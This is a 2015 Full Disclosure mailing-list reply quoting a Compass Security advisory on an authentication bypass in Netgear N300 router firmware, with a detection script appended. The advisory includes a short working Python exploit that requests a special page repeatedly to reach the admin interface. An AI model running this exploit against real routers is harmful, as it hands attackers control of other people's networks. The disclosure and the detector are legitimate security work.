Message-ID: <CAEqqQab5HUhZP+spQs-SBTD1itCYNoGzLe+NZHMj9uExzCf3PQ@mail.gmail.com>
Date: Tue, 6 Oct 2015 10:01:35 -0700
From: Joe G <joseph.giron13@...il.com>
To: Alexandre Herzog <Alexandre.Herzog@...c.ch>
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Re: [FD] Authentication Bypass in Netgear Router Firmware N300_1.1.0.31_1.0.1.img and N300-1.1.0.28_1.0.1.img
I can confirm that this is actively being exploited in the wild as we
speak. I got owned last week.
On Tue, Oct 6, 2015 at 7:59 AM, Alexandre Herzog <Alexandre.Herzog@...c.ch>
wrote:
> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img
> # and N300-1.1.0.28_1.0.1.img
> # Vendor: NETGEAR
> # CVE ID: requested
> # Subject: Authentication Bypass
> # Risk: High
> # Effect: Remotely exploitable over LAN/WLAN
> # Author: Daniel Haake (daniel.haake@...c.de)
> # Date: 06.10.2015
> #
> #############################################################
>
>
> Introduction:
> -------------
> Multiple NETGEAR wireless routers are out of the box vulnerable
> to an authentication bypass attack. No router options have to
> be changed to exploit the issue. So an attacker can access the
> administration interface of the router without submitting any
> valid username and password, just by requesting a special URL
> several times.
>
>
> Affected:
> ---------
> - Router Firmware: N300_1.1.0.31_1.0.1.img
> - Router Firmware: N300-1.1.0.28_1.0.1.img
> - tested and confirmed on the WNR1000v4 router with both firmwares
> - other products may also be vulnerable because the firmware is used in
> multiple devices
>
>
> Technical Description:
> ----------------------
> The attacker can exploit the issue by using a browser or writing a simple
> exploit.
> 1. When a user wants to access the web interface, an HTTP basic
> authentication login process is initiated
> 2. If he does not know the username and password he gets redirected to the
> 401_access_denied.htm file
> 3. An attacker now has to call the URL
> http://<ROUTER-IP>/BRS_netgear_success.html multiple times
> -> After that he can access the administration web interface and there
> is no username/password prompt
>
>
> Example Python script:
> ----------------------
> # Python 2 script (urllib2, print statements); usage: python script.py <ROUTER-IP>
> import os
> import urllib2
> import time
> import sys
>
> try:
>     # A 200 on the root page means no HTTP basic auth is in front of the admin UI
>     first = urllib2.urlopen("http://" + sys.argv[1])
>     print "No password protection!"
> except:
>     # urllib2 raises HTTPError on the 401 challenge
>     print "Password protection detected!"
>     print "Executing exploit..."
>     # Request the special page several times, one second apart
>     for i in range(0, 3):
>         time.sleep(1)
>         urllib2.urlopen("http://" + sys.argv[1] +
>                         "/BRS_netgear_success.html")
>
>     # Re-check the root page: a 200 now means the auth prompt is gone
>     second = urllib2.urlopen("http://" + sys.argv[1])
>     if second.getcode() == 200:
>         print "Bypass successful. Now use your browser to have a look at the admin interface."
>
>
> Workaround/Fix:
> ---------------
> None so far. A patch already fixing this vulnerability was developed by
> Netgear but not released so far
> (see timeline below).
>
>
> Timeline:
> ---------
> Vendor Status: works on patch-release
> 21.07.2015: Vendor notified per email (security@...gear.com)
> -> No response
> 23.07.2015: Vendor notified via official chat support
> 24.07.2015: Support redirected notification to the technical team
> 29.07.2015: Requested status update and asked if they need further
> assistance
> -> No response
> 21.08.2015: Notified vendor that we will go full disclosure within 90 days
> if they do not react
> 03.09.2015: Support again said that they will redirect it to the technical
> team
> 03.09.2015: Netgear sent some beta firmware version to look if the
> vulnerability is fixed
> 03.09.2015: Confirmed to Netgear that the problem is solved in this version
> Asked Netgear when they plan to release the firmware with this
> security fix
> 11.09.2015: Response from Netgear saying they will not disclose the patch
> release day
> 15.09.2015: Asked Netgear again when they plan to publish the security fix
> for the second time
> -> No response
> 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
> 06.10.2015: Forced public release of this advisory to follow up on [2]
>
>
> References:
> -----------
> [1] http://support.netgear.com/product/WNR1000v4
> [2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
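As an added defensive example, not part of the advisory or of this thread: a small Python 3 detector that scans web access-log lines for the pattern the advisory describes, a client requesting /BRS_netgear_success.html repeatedly within a short window and then being served a 200 for a resource it had earlier been refused with a 401. The advisory does not provide any logs, so the Common Log Format sample lines below are constructed, and the log layout, the three-hits threshold and the 60-second window are assumptions; the router itself typically does not expose such a log, so this is the kind of check one would run on a monitoring proxy or IDS in front of the device.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access-log lines (Common Log Format); not real traffic
# and not taken from the advisory. 192.168.1.23 models the bypass sequence,
# 192.168.1.50 a single benign hit on the same page.
SAMPLE_LOG = """\
192.168.1.23 - - [06/Oct/2015:10:00:01 -0700] "GET / HTTP/1.1" 401 0
192.168.1.23 - - [06/Oct/2015:10:00:02 -0700] "GET /BRS_netgear_success.html HTTP/1.1" 200 1234
192.168.1.23 - - [06/Oct/2015:10:00:03 -0700] "GET /BRS_netgear_success.html HTTP/1.1" 200 1234
192.168.1.23 - - [06/Oct/2015:10:00:04 -0700] "GET /BRS_netgear_success.html HTTP/1.1" 200 1234
192.168.1.23 - - [06/Oct/2015:10:00:05 -0700] "GET / HTTP/1.1" 200 5678
192.168.1.50 - - [06/Oct/2015:10:01:00 -0700] "GET /BRS_netgear_success.html HTTP/1.1" 200 1234
192.168.1.50 - - [06/Oct/2015:10:01:01 -0700] "GET / HTTP/1.1" 401 0
"""

# The page named in the advisory
BYPASS_PATH = "/BRS_netgear_success.html"

# client, timestamp, method, path, status (assumed CLF layout)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    return {
        "client": client,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "method": method,
        "path": path,
        "status": int(status),
    }


def detect_bypass_attempts(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return one alert per client that requests BYPASS_PATH at least
    `threshold` times within `window`. Each alert also records whether that
    client was afterwards served a 200 for a path it had earlier received a
    401 for, i.e. whether the authentication prompt disappeared."""
    recent = defaultdict(deque)   # client -> timestamps of recent BYPASS_PATH hits
    denied = defaultdict(set)     # client -> paths that answered 401 earlier
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        c = rec["client"]
        if rec["status"] == 401:
            denied[c].add(rec["path"])
        if rec["path"] == BYPASS_PATH:
            q = recent[c]
            q.append(rec["time"])
            # Drop hits older than the sliding window
            while q and rec["time"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and c not in alerts:
                alerts[c] = {"client": c, "hits": len(q),
                             "first": q[0], "bypassed": False}
        elif rec["status"] == 200 and rec["path"] in denied[c] and c in alerts:
            # Previously refused resource now served without a challenge
            alerts[c]["bypassed"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bypass_attempts(SAMPLE_LOG):
        print("%s: %d hits on %s from %s, bypass confirmed: %s" % (
            alert["client"], alert["hits"], BYPASS_PATH,
            alert["first"].isoformat(), alert["bypassed"]))
```

The repeated-hit rule alone is noisy (the page is also reachable during normal setup), so the alert only escalates when the same client is subsequently served a resource it had been refused; tune the threshold and window to the traffic of the network being monitored.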